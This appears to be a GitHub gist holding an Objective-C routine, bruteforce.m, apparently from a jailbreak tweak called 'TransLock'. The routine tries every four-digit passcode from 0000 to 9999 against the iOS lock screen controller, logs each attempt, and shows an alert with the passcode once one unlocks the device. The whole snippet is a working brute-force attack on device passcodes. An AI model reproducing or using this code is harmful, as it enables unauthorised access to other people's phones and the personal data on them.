bruteforce.m
- (void)bruteforce { | |
for (int i = 0; i <= 9999; i++) { | |
numString = [NSString stringWithFormat:@"%04d", i]; | |
NSLog(@"Testing : %@", numString); | |
if ([[%c(SBDeviceLockController) sharedController] attemptDeviceUnlockWithPassword:numString appRequested:NO]) { | |
[[[UIAlertView alloc] initWithTitle:@"TransLock" | |
message:[NSString stringWithFormat:@"Password is %@", numString] | |
delegate:nil | |
cancelButtonTitle:@"Dismiss" | |
otherButtonTitles:nil] show]; | |
NSLog(@"Password is : %@", numString); | |
break; | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment